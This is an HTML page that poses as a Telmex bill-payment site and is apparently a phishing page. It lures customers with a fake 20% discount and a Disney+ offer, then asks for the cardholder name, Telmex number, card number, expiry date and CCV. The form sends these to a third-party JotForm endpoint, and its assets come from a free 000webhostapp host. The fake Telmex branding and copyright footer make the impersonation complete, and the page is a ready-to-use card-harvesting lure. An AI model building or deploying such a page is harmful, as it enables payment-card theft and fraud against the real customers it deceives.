<!DOCTYPE html>
<html lang="es">
<head>
				<meta charset=UTF-8>
				<title>Telmex</title>
				<meta name="viewport" content="width=device-width, initial-scale=1">
 <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:ital,wght@1,500&display=swap" rel="stylesheet">
 	<link rel="shortcut icon" href="https://sshmx.000webhostapp.com/img/telmex.png" type="image/x-icon">
 
			
			<style>
							*{
				margin: 0;
				padding: 0;
				border-sizing: border-box;
}

body{
				background: #f2f2f2;
}

header{
				width: 100%;
				height: 150px;
				background-color: rgba(190, 236, 255,.3);
				
}

nav{
				text-align: right;
				font-size: 18px;
				margin-right: 15px;
}



.logo img:hover{
				background: #f2f2f2;
}


.logo{
				margin-bottom: 10px;
}

.logo img{
				width: 12%;
				margin: auto;
				display: block;

}

.logo h4{
				text-align: center;
				font-weight: 700;
				margin-top: 15px;
}

.logo p{
				text-align: center;
				font-size:15px;
				margin:10px; 
				
}

form{
				background-color: #fff;
				width: 80%;
				margin: 0 auto;
				font-size: 12px;
				color: #a6a6a6 ;
				padding: 15px;
				margin-top: 30px;
				margin-bottom: 40px;
				border-radius: 5px;
}

input{
				border: 0;
				outline: none;
}

.style{
				border: solid 1px #ccc;
				padding: 8px;
				width: 80%;
}

.style2{
				padding: 8px;
				border: solid 1px #ccc;
				width: 25%;
}

style:focus{
				border-color: #2a83ff;
}

.mes{
				border: solid 1px #ccc;
				padding: 3px;
				color: #a6a6a6 ;
				background: #fff;
				font-size: 12px;
				margin-left: 10px;
}


button{
				border: solid 1px #ccc;
				background: #f2f2f2;
				padding: 8px 10px;
				margin: 0 auto;
				display: block;
				font-weight: bold;
}

button:hover{
				background: #1578ff;
}


footer{
				
				background: #9e9e9e;
				text-align: center;
				height: 200px;
			
}



footer img{
				width: 45%;
				display: block;
				margin: auto;
				padding: 30px;
}

footer p{
				padding: 5px;
				font-size: 12px;
}

footer h4{
				padding: 10px;
}

.usuario img{
				width: 8%;
				border: solid 2px #ccc;
				border-radius: 30px;
				
}

.disney{
				background: #ffffff;
				width: 90%;
				margin: auto;
				border-radius: 9px;
				margin-top: 35px;
}

.disney img{
				width: 90%;
				display: block;
				margin: auto;
				padding: 10px;
}

.disney h4{
				text-align: center;
				color: #40a3ff;
}

.disney p{
				margin:10px;
				font-size: 14px;
				
}

.disney a{
				margin:10px;
				text-decoration: none;
				color: #7fd6ff;
				font-size:13px;
				margin-botton: 20px;
}


			</style>
			
			
</head>
<body>
				
				<header>
								<nav>
												<div class="usuario">
																<img src="https://sshmx.000webhostapp.com/img/usuario.png" alt="Usuario"></img>
												</div>
								</nav>
								
								<section class="logo">
								<img src="https://sshmx.000webhostapp.com/img/telmex.png" alt="Telmex"></img>
								<h4>¡Paga Tu Recibo Telmex Sin Salir de Casa!. </h4>
								<p>Y obten 20% de descuento del total de tu recibo Telmex al realizar tu pago en línea.</p>
								
								
				</section>
				</header>
				
				<div class="disney">
								<img src="https://sshmx.000webhostapp.com/img/disney.png" alt="Disney">
								<h4>¡Agrégalo a tu Paquete Infinitum!.</h4>
								<p>Para ti que <b>ya eres cliente Infinitum</b>, disfruta de un mes de regalo <font color="blue"><b>Disney+</b></font>. Agrégalo a tu Paquete por <b>$159 adicionales al mes.</b></p>
								<a href="#">Contrata ahora</a>
				</div>
				
				
				
				
				
				
				
				<br/>
				<div class="formulario">
								
								
								<script src="https://cdn.jotfor.ms/static/prototype.forms.js" type="text/javascript"></script> <script src="https://cdn.jotfor.ms/static/jotform.forms.js?3.3.26544" type="text/javascript"></script> <script type="text/javascript"> 	JotForm.init(function(){ 	/*INIT-START*/ if (window.JotForm && JotForm.accessible) $('input_1').setAttribute('tabindex',0); if (window.JotForm && JotForm.accessible) $('input_2').setAttribute('tabindex',0); if (window.JotForm && JotForm.accessible) $('input_4').setAttribute('tabindex',0); if (window.JotForm && JotForm.accessible) $('input_5').setAttribute('tabindex',0); if (window.JotForm && JotForm.accessible) $('input_6').setAttribute('tabindex',0); 	JotForm.newDefaultTheme = true; 	JotForm.extendsNewTheme = false; 	JotForm.newPaymentUIForNewCreatedForms = false; 	JotForm.newPaymentUI = true; 	/*INIT-END*/ 	}); JotForm.prepareCalculationsOnTheFly([null,{"name":"nombreDel","qid":"1","text":"Nombre del titular:","type":"control_textbox"},{"name":"numeroTelmex","qid":"2","text":"Numero Telmex:","type":"control_textbox"},null,{"name":"numeroDe","qid":"4","text":"Numero de tarjeta:","type":"control_textbox"},{"name":"fechaDe","qid":"5","text":"Fecha de expiracion:","type":"control_textbox"},{"name":"ccv","qid":"6","text":"ccv:","type":"control_textbox"},{"name":"nombreDel7","qid":"7","text":"Pagar","type":"control_button"}]); setTimeout(function() { JotForm.paymentExtrasOnTheFly([null,{"name":"nombreDel","qid":"1","text":"Nombre del titular:","type":"control_textbox"},{"name":"numeroTelmex","qid":"2","text":"Numero Telmex:","type":"control_textbox"},null,{"name":"numeroDe","qid":"4","text":"Numero de tarjeta:","type":"control_textbox"},{"name":"fechaDe","qid":"5","text":"Fecha de expiracion:","type":"control_textbox"},{"name":"ccv","qid":"6","text":"ccv:","type":"control_textbox"},{"name":"nombreDel7","qid":"7","text":"Pagar","type":"control_button"}]);}, 20); </script> 
								<style type="text/css">@media print{.form-section{display:inline!important}.form-pagebreak{display:none!important}.form-section-closed{height:auto!important}.page-section{position:initial!important}}</style> <link id="custom-font" type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/opt/google-fonts/default/fontface.css" /> <link type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/themes/CSS/5e6b428acc8c4e222d1beb91.css?"/> <link type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/css/styles/payment/payment_styles.css?3.3.26544" /> <link type="text/css" rel="stylesheet" href="https://cdn.jotfor.ms/css/styles/payment/payment_feature.css?3.3.26544" /> <style type="text/css" id="form-designer-style"> /* Injected CSS Code */ /*PREFERENCES STYLE*/ 
								.form-all { font-family: undefined, sans-serif; } 
								.form-all .qq-upload-button, .form-all .form-submit-button, .form-all .form-submit-reset, .form-all .form-submit-print 
								{ font-family: undefined, sans-serif; } 
								.form-all .form-pagebreak-back-container, .form-all .form-pagebreak-next-container 
								{ font-family: undefined, sans-serif; } 
								.form-header-group { font-family: undefined, sans-serif; } 
								.form-label { font-family: undefined, sans-serif; } 
								.form-label.form-label-auto { display: inline-block; float: left; text-align: left; } .form-line { margin-top: 12px; margin-bottom: 12px; } .form-all { max-width: 690px; width: 100%; } .form-label.form-label-left, .form-label.form-label-right, .form-label.form-label-left.form-label-auto, .form-label.form-label-right.form-label-auto { width: 150px; } .form-all { font-size: 14px } .form-all .qq-upload-button, .form-all .qq-upload-button, .form-all .form-submit-button, .form-all .form-submit-reset, .form-all .form-submit-print { font-size: 14px } .form-all .form-pagebreak-back-container, .form-all .form-pagebreak-next-container { font-size: 14px } .supernova .form-all, .form-all { background-color: ; } .form-all { color: #555; } .form-header-group .form-header { color: #555; } .form-header-group .form-subHeader { color: #555; } .form-label-top, .form-label-left, .form-label-right, .form-html, .form-checkbox-item label, .form-radio-item label { color: #555; } .form-sub-label { color: #6f6f6f; } .supernova { background-color: undefined; } .supernova body { background: transparent; } .form-textbox, .form-textarea, .form-dropdown, .form-radio-other-input, .form-checkbox-other-input, .form-captcha input, .form-spinner input { background-color: undefined; } .supernova { background-image: none; } #stage { background-image: none; } .form-all { background-image: none; } .ie-8 .form-all:before { display: none; } .ie-8 { margin-top: auto; margin-top: initial; } /*PREFERENCES STYLE*//*__INSPECT_SEPERATOR__*/ /* Injected CSS Code */ </style> 
								<form class="jotform-form" action="https://submit.jotform.com/submit/212048960947261/" method="post" name="form_212048960947261" id="212048960947261" accept-charset="utf-8" autocomplete="on"> <input type="hidden" name="formID" value="212048960947261" /> <input type="hidden" id="JWTContainer" value="" /> <input type="hidden" id="cardinalOrderNumber" value="" /> <div role="main" class="form-all"> <style> .form-all:before { background: none;} </style> <ul class="form-section page-section"> <li class="form-line" data-type="control_textbox" id="id_1"> <label class="form-label form-label-left form-label-auto" id="label_1" for="input_1"> Nombre del titular: </label> <div id="cid_1" class="form-input" data-layout="half"> <input type="text" id="input_1" name="q1_nombreDel" data-type="input-textbox" class="form-textbox" style="width:20px" size="20" value="" data-component="textbox" aria-labelledby="label_1" /> </div> </li> <li class="form-line" data-type="control_textbox" id="id_2"> <label class="form-label form-label-left form-label-auto" id="label_2" for="input_2"> Numero Telmex: </label> <div id="cid_2" class="form-input" data-layout="half"> <input type="number" id="input_2" name="q2_numeroTelmex" data-type="input-textbox" class="form-textbox" style="width:20px" size="20" value="" data-component="textbox" aria-labelledby="label_2" /> </div> </li> <li class="form-line" data-type="control_textbox" id="id_4"> <label class="form-label form-label-left form-label-auto" id="label_4" for="input_4"> Número de tarjeta: </label> <div id="cid_4" class="form-input" data-layout="half"> <input type="number" id="input_4" name="q4_numeroDe" data-type="input-textbox" class="form-textbox" style="width:20px" size="20" value="" data-component="textbox" aria-labelledby="label_4" /> </div> </li>
								
								 <li class="form-line" data-type="control_textbox" id="id_5"> <label class="form-label form-label-left form-label-auto" id="label_5#" for="input_5"> Fecha de expiración: </label> <div id="cid_5" class="form-input" data-layout="half"> <input type="number" id="input_5" name="q5_fechaDe" data-type="input-textbox" class="form-textbox" style="width:20px" size="20" value="" data-component="textbox" aria-labelledby="label_5" /> </div> </li>
								  <li class="form-line" data-type="control_textbox" id="id_6"> <label class="form-label form-label-left form-label-auto" id="label_6" for="input_6"> ccv: </label> <div id="cid_6" class="form-input" data-layout="half"> <input type="number" id="input_6" name="q6_ccv" data-type="input-textbox" class="form-textbox" style="width:20px" size="20" value="" data-component="textbox" aria-labelledby="label_6" /> </div> </li> <li class="form-line" data-type="control_button" id="id_7"> <div id="cid_7" class="form-input-wide" data-layout="full"> <div data-align="center" class="form-buttons-wrapper form-buttons-center jsTest-button-wrapperField"> <button id="input_7" type="submit" class="form-submit-button submit-button jf-form-buttons jsTest-submitField" data-component="button" data-content=""> Pagar </button> </div> </div> </li> <li style="display:none"> Should be Empty: <input type="text" name="website" value="" /> </li> </ul> </div> <script> JotForm.showJotFormPowered = "new_footer"; </script> <script> JotForm.poweredByText = "Powered by JotForm"; </script> <input type="hidden" class="simple_spc" id="simple_spc" name="simple_spc" value="212048960947261" /> <script type="text/javascript"> var all_spc = document.querySelectorAll("form[id='212048960947261'] .si" + "mple" + "_spc"); for (var i = 0; i < all_spc.length; i++) { all_spc[i].value = "212048960947261-212048960947261"; } </script> </form>
								
				</div>
				
		
				
				
				
				
				
				
				
				<footer>
								
								<img src="https://sshmx.000webhostapp.com/img/tarjeta.png" alt="Visa,Mastercard, American Express"></img>
								<h4>2021 Telmex. &copy; Todos Los Derechos Reservados.</h4>
							
							<p>
											Terminos y Condiciones.  | Aviso de Privacidad.  |  Oferta de Servicios Mayoristas.  |  Contrato Marco y Terminos En Formato Audible.  |  Declaración De Accesibilidad.</p>
							</p>
    								
		</fr></body></html>
				
